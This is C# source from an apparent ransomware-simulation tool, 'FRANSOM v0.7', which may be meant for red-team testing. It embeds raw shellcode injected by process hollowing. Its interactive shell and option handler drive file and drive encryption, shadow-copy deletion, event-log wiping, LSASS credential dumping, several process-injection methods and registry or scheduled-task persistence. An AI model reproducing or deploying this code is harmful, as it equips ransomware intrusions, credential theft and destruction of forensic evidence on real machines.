public void ExecuteProcessHollowing()
{
byte[] shellcode = new byte[184] {
0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,
0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,
0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01, 0xd1,
0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b,
0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03,
0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,
0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,
0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,
0x8d, 0x5d, 0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b, 0x6f,
0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5,
0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,
0x00, 0x53, 0xff, 0xd5
};
byte[] finalshellcode = new byte[shellcode.Length + target_.Length + 1];
Array.Copy(shellcode, finalshellcode, shellcode.Length);
Array.Copy(target_, 0, finalshellcode, shellcode.Length, target_.Length);
finalshellcode[shellcode.Length + target_.Length] = 0;
ProcessHollowing ldr = new ProcessHollowing();
try
{
ldr.Load(HollowedProcessX85, finalshellcode);
}
catch (Exception e)
{
Console.WriteLine("[x] Something went wrong!" + e.Message);
}
}
static void InteractiveShell()
{
string command = "";
string line = "";
int process_id;
var d = new DumpLSASS();
var p = new Persistence();
var e = new Enumerate();
var pr = new Program();
var ph = new ProcessHollowing();
Logger.WriteLine("");
Logger.WriteLine(FiggleFonts.Doom.Render("FRANSOM v0.7"));
Logger.WriteLine("Copyright (c) 2021 Fraktal Ltd.");
Logger.WriteLine("");
while (command != "exit")
{
Logger.Write("FRANSOM> ");
command = Console.ReadLine();
Logger.WriteLine("*** Executing command: '" + command + "' ***");
switch (command)
{
case "log-on":
Logger.LogToFile(true);
break;
case "log-off":
Logger.LogToFile(false);
break;
case "help":
DisplayHelpShell();
break;
case "enumerate-user-profile":
pr.EnumerateUserProfile();
break;
case "encrypt-user-profile":
pr.EncryptUserProfile();
break;
case "decrypt-user-profile":
DecryptUserProfile();
break;
case "create-local-dummy-data":
LocalDummyDataCreation();
break;
case "cleanup-user-profile":
CleanupUserProfile();
break;
case "enumerate-mounted-drives":
pr.DoDriveEnumeration();
break;
case "encrypt-mounted-drives":
pr.DoDriveEncryption();
break;
case "decrypt-mounted-drives":
DoDriveDecryption();
break;
case "create-mounted-drives-dummy-data":
MountedDrivesDummyDataCreation();
break;
case "cleanup-mounted-drives":
DoDriveCleanup();
break;
case "enumerate-shadow-copies":
EnumerateShadowCopies();
break;
case "delete-shadow-copies":
pr.DeleteShadowCopies();
break;
case "net-assembly-injection":
pr.NetAssemblyInjection();
break;
case "kill-office-applications":
pr.KillOfficeApplications();
break;
case "thread-inject":
Logger.Write("Enter process ID: ");
line = Console.ReadLine();
if (int.TryParse(line, out process_id))
{
pr.DoThreadInjection(process_id);
}
else
{
Logger.WriteLine("The value provided is not a valid process id.");
}
break;
case "apc-inject":
Logger.Write("Enter process ID: ");
line = Console.ReadLine();
if (int.TryParse(line, out process_id))
{
DoApcInjection(process_id);
}
else
{
Logger.WriteLine("The value provided is not a valid process id.");
}
break;
case "apc-inject-new-process":
pr.DoApcInjectionNewProcess();
break;
case "remote-thread":
Logger.Write("Enter process ID: ");
line = Console.ReadLine();
if (int.TryParse(line, out process_id))
{
DoRemoteThread(process_id);
}
else
{
Logger.WriteLine("The value provided is not a valid process id.");
}
break;
case "process-hollowing":
ph.ExecuteProcessHollowing();
break;
case "delete-eventlogs":
pr.DeleteEventLogs();
break;
case "dump-lsass":
d.Run();
break;
case "userregkey":
p.UserRegKey();
break;
case "userregkey-clean":
p.CleanupUserRegKey();
break;
case "scheduled-task":
p.CreateScheduledTask();
break;
case "scheduled-task-clean":
p.RemoveScheduledTask();
break;
case "ps":
e.EnumerateProcesses();
break;
case "domain-users":
e.EnumerateDomainUsers();
break;
case "domain-groups":
e.EnumerateDomainGroups();
break;
case "domain-computers":
e.EnumerateDomainComputers();
break;
case "domain-trusts":
e.EnumerateDomainTrusts();
break;
case "domain-shares":
e.EnumerateDomainShares();
break;
case "exit":
break;
default:
Logger.WriteLine("Invalid command - enter \"help\" to list all available options.");
break;
}
}
}
static void Run(Options options)
{
var pr = new Program();
if (options.EnumerateUserProfile)
{
pr.EnumerateUserProfile();
}
else if (options.EncryptUserProfile)
{
pr.EncryptUserProfile();
}
else if (options.DecryptUserProfile)
{
DecryptUserProfile();
}
else if (options.CreateLocalDummyData)
{
LocalDummyDataCreation();
}
else if (options.CreateMountedDrivesDummyData)
{
MountedDrivesDummyDataCreation();
}
else if (options.CleanupUserProfile)
{
CleanupUserProfile();
}
else if (options.EnumerateMountedDrives)
{
pr.DoDriveEnumeration();
}
else if (options.EncryptMountedDrives)
{
pr.DoDriveEncryption();
}
else if (options.DecryptMountedDrives)
{
DoDriveDecryption();
}
else if (options.CleanupMountedDrives)
{
DoDriveCleanup();
}
else if (options.EnumerateShadowCopies)
{
EnumerateShadowCopies();
}
else if (options.DeleteShadowCopies)
{
pr.DeleteShadowCopies();
}
else if (options.NetAssemblyInjection)
{
pr.NetAssemblyInjection();
}
else if (options.KillOfficeApplications)
{
pr.KillOfficeApplications();
}
else if (options.ThreadInject > 0)
{
pr.DoThreadInjection(options.ThreadInject);
}
else if (options.APCInject > 0)
{
DoApcInjection(options.APCInject);
}
else if (options.APCInjectNewProcess)
{
pr.DoApcInjectionNewProcess();
}
else if (options.RemoteThread > 0)
{
DoRemoteThread(options.RemoteThread);
}
if (options.ProcessHollowing)
{
var ph = new ProcessHollowing();
ph.ExecuteProcessHollowing();
}
if (options.DeleteLogs)
{
foreach (var log in EventLog.GetEventLogs())
{
Logger.WriteLine("Deleting " + log.LogDisplayName);
log.Clear();
log.Dispose();
}
Logger.WriteLine("Done, all event logs gone!");
}
if (options.UserRegKey)
{
var p = new Persistence();
p.UserRegKey();
}
if (options.UserRegKeyClear)
{
var p = new Persistence();
p.CleanupUserRegKey();
}
if (options.ScheduledTask)
{
var p = new Persistence();
p.CreateScheduledTask();
}
if (options.ScheduledTaskClean)
{
var p = new Persistence();
p.RemoveScheduledTask();
}
if (options.DumpLsass)
{
var d = new DumpLSASS();
d.Run();
}
if (options.ListProcesses)
{
var e = new Enumerate();
e.EnumerateProcesses();
}
if (options.EnumDomainUsers)
{
var e = new Enumerate();
e.EnumerateDomainUsers();
}
if (options.EnumDomainGroups)
{
var e = new Enumerate();
e.EnumerateDomainGroups();
}
if (options.EnumDomainComputers)
{
var e = new Enumerate();
e.EnumerateDomainComputers();
}
if (options.EnumDomainTrusts)
{
var e = new Enumerate();
e.EnumerateDomainTrusts();
}
if (options.Shell)
{
InteractiveShell();
}
}
